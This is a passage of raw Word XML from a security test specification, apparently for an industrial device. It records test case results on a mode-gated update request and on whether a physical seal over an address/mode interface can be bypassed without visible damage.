      <w:tr w:rsidR="00A544A4" w:rsidRPr="006D5B99"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273A9131" w:rsidR="00A544A4" w:rsidRPr="006D5B99" w:rsidRDefault="00A544A4" w:rsidP="00A544A4">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F005546" w14:textId="6FE9D641" w:rsidR="00A544A4" w:rsidRPr="006D5B99" w:rsidRDefault="00A544A4" w:rsidP="00A544A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Expected PASS </w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> the update request is rejected outside the update state and accepted only inside it (mode gate works).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46EAFB63" w14:textId="77777777" w:rsidR="008A392A" w:rsidRPr="006D5B99" w:rsidRDefault="008A392A" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D8AFCBF" w14:textId="77777777" w:rsidR="00F3610F" w:rsidRPr="006D5B99" w:rsidRDefault="00F3610F" w:rsidP="00F3610F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="080F1916" w14:textId="0E123C7D" w:rsidR="00F3610F" w:rsidRPr="006D5B99" w:rsidRDefault="00F3610F" w:rsidP="00F3610F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ011-05 - </w:t>
      </w:r>
      <w:r w:rsidR="004C3C07" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Physical-Barrier Silent Defeat </w:t>
      </w:r>
      <w:r w:rsidR="004C3C07" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>⇄</w:t>
      </w:r>
      <w:r w:rsidR="004C3C07" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TC-</w:t>
      </w:r>
      <w:r w:rsidR="00B82652" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ</w:t>
      </w:r>
      <w:r w:rsidR="004C3C07" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>003-</w:t>
      </w:r>
      <w:r w:rsidR="00B82652" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>03</w:t>
      </w:r>
      <w:r w:rsidR="004C3C07" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> / TC-</w:t>
      </w:r>
      <w:r w:rsidR="00B82652" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ</w:t>
      </w:r>
      <w:r w:rsidR="004C3C07" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>002-</w:t>
      </w:r>
      <w:r w:rsidR="00B82652" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>05</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46421179" w14:textId="77777777" w:rsidR="00F3610F" w:rsidRPr="006D5B99" w:rsidRDefault="00F3610F" w:rsidP="00F3610F">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6D5B99"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6D5B99" w:rsidRDefault="00F3610F" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B5AAB78"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6D5B99" w:rsidRDefault="00F3610F" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F6CFDBB" w14:textId="52C59C01" w:rsidR="00F3610F" w:rsidRPr="006D5B99"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RQ-011 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="sv-SE"/>
              </w:rPr>
              <w:t xml:space="preserve"> EDR 3.11 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="sv-SE"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset G, Asset B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F3610F" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00F3610F" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E7EFEA0" w14:textId="224D2E76"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F3610F" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00F3610F" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BB7F06A" w14:textId="70C466EB" w:rsidR="00F3610F" w:rsidRPr="006D5B99"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SVV-4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F3610F" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00F3610F" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5436B372" w14:textId="5A65EBCA" w:rsidR="00F3610F" w:rsidRPr="006D5B99"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B82652" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>003-</w:t>
            </w:r>
            <w:r w:rsidR="00B82652" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>03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confirm that the physical address/mode interface can be altered without visible seal damage and that the change applies after restart, the authorization barrier's silent-defeat question.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F3610F" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00F3610F" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6267FB55" w14:textId="2D49AE71" w:rsidR="00F3610F" w:rsidRPr="006D5B99"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B82652" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>003-</w:t>
            </w:r>
            <w:r w:rsidR="00B82652" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> / TC-</w:t>
            </w:r>
            <w:r w:rsidR="00B82652" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>002-</w:t>
            </w:r>
            <w:r w:rsidR="00B82652" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">; record against RQ-011 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F3610F" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00F3610F" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6695590E" w14:textId="77777777" w:rsidR="00F3610F"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 referenced.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="291AFF69" w14:textId="3A451A88" w:rsidR="0034645C" w:rsidRPr="006D5B99"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barrier can be silently defeated </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> confirms the physical-authorization gap.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2647E2D1" w14:textId="77777777" w:rsidR="00F3610F" w:rsidRPr="006D5B99" w:rsidRDefault="00F3610F" w:rsidP="00F3610F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ED542FE" w14:textId="77777777" w:rsidR="00F3610F" w:rsidRPr="006D5B99" w:rsidRDefault="00F3610F" w:rsidP="00F3610F">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6D5B99"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6D5B99" w:rsidRDefault="00F3610F" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00D8B9D0" w14:textId="77777777" w:rsidR="00F3610F" w:rsidRPr="006D5B99"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3610F" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00F3610F" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1079DB6D" w14:textId="4A29E3E7" w:rsidR="00F3610F" w:rsidRPr="006D5B99"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TC-RQ011-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D3218" w:rsidRPr="006D5B99"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9D3218" w:rsidRPr="006D5B99" w:rsidRDefault="009D3218" w:rsidP="009D3218">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0701E54C" w14:textId="42A2B240"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identical to TC-RQ002-05/TC-RQ003-03 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D3218" w:rsidRPr="006D5B99"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9D3218" w:rsidRPr="006D5B99" w:rsidRDefault="009D3218" w:rsidP="009D3218">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F526BB0" w14:textId="036D7C7F"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6D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
              </w:rPr>
              <w:t>See TC-RQ002-05.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D3218" w:rsidRPr="006D5B99"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9D3218" w:rsidRPr="006D5B99" w:rsidRDefault="009D3218" w:rsidP="009D3218">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EEDBC71" w14:textId="1A4DBDB9" w:rsidR="009D3218" w:rsidRPr="006D5B99" w:rsidRDefault="009D3218" w:rsidP="009D321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Execute per TC-RQ002-05 / TC-RQ003-03; record the result under RQ-011 traceability, do not re-derive.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D3218" w:rsidRPr="006D5B99" w14:paraId="30F040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FDC71C" w14:textId="366EFFA7" w:rsidR="009D3218" w:rsidRPr="006D5B99" w:rsidRDefault="009D3218" w:rsidP="009D3218">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04CC694C" w14:textId="5AE8E0CE" w:rsidR="009D3218" w:rsidRPr="006D5B99" w:rsidRDefault="009D3218" w:rsidP="009D321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TC-RQ002-05 </w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> the seal provides only passive protection, manipulation is possible without visible damage, and the effect only applies after a cold start.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="15348F79" w14:textId="77777777" w:rsidR="00F3610F" w:rsidRPr="006D5B99" w:rsidRDefault="00F3610F" w:rsidP="00F3610F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01EDB4E3" w14:textId="77777777" w:rsidR="008A392A" w:rsidRPr="006D5B99" w:rsidRDefault="008A392A" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C105A34" w14:textId="77777777" w:rsidR="00AB13AD" w:rsidRPr="006D5B99" w:rsidRDefault="00AB13AD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E0176AB" w14:textId="77777777" w:rsidR="0034645C" w:rsidRPr="006D5B99" w:rsidRDefault="0034645C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58406E40" w14:textId="77777777" w:rsidR="0034645C" w:rsidRPr="006D5B99" w:rsidRDefault="0034645C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="352B6AA2" w14:textId="77777777" w:rsidR="0034645C" w:rsidRPr="006D5B99" w:rsidRDefault="0034645C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58EADDF1" w14:textId="77777777" w:rsidR="0034645C" w:rsidRPr="006D5B99" w:rsidRDefault="0034645C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C112C1D" w14:textId="77777777" w:rsidR="0034645C" w:rsidRPr="006D5B99" w:rsidRDefault="0034645C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D97B2AD" w14:textId="77777777" w:rsidR="0034645C" w:rsidRPr="006D5B99" w:rsidRDefault="0034645C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="757E7B11" w14:textId="77777777" w:rsidR="0034645C" w:rsidRPr="006D5B99" w:rsidRDefault="0034645C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24844B8A" w14:textId="77777777" w:rsidR="0034645C" w:rsidRPr="006D5B99" w:rsidRDefault="0034645C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="398BD3F4" w14:textId="77777777" w:rsidR="0034645C" w:rsidRPr="006D5B99" w:rsidRDefault="0034645C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26E5F54D" w14:textId="77777777" w:rsidR="0034645C" w:rsidRPr="006D5B99" w:rsidRDefault="0034645C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C259CE0" w14:textId="77777777" w:rsidR="0034645C" w:rsidRPr="006D5B99" w:rsidRDefault="0034645C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E8D816A" w14:textId="77777777" w:rsidR="0034645C" w:rsidRPr="006D5B99" w:rsidRDefault="0034645C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C2E83FC" w14:textId="77777777" w:rsidR="0034645C" w:rsidRPr="006D5B99" w:rsidRDefault="0034645C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1891D777" w14:textId="77777777" w:rsidR="0034645C" w:rsidRPr="006D5B99" w:rsidRDefault="0034645C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="611B9557" w14:textId="77777777" w:rsidR="0034645C" w:rsidRPr="006D5B99" w:rsidRDefault="0034645C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1513963B" w14:textId="77777777" w:rsidR="0034645C" w:rsidRPr="006D5B99" w:rsidRDefault="0034645C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12C58B7D" w14:textId="77777777" w:rsidR="0034645C" w:rsidRPr="006D5B99" w:rsidRDefault="0034645C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BBD9714" w14:textId="77777777" w:rsidR="0034645C" w:rsidRPr="006D5B99" w:rsidRDefault="0034645C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="092A7ED4" w14:textId="77777777" w:rsidR="0034645C" w:rsidRPr="006D5B99" w:rsidRDefault="0034645C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25FBEAA6" w14:textId="77777777" w:rsidR="0034645C" w:rsidRPr="006D5B99" w:rsidRDefault="0034645C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71C53917" w14:textId="77777777" w:rsidR="0034645C" w:rsidRPr="006D5B99" w:rsidRDefault="0034645C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="560D953F" w14:textId="77777777" w:rsidR="0034645C" w:rsidRPr="006D5B99" w:rsidRDefault="0034645C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04362CC1" w14:textId="77777777" w:rsidR="0034645C" w:rsidRPr="006D5B99" w:rsidRDefault="0034645C" w:rsidP="009C0A46">
      <w:pPr>
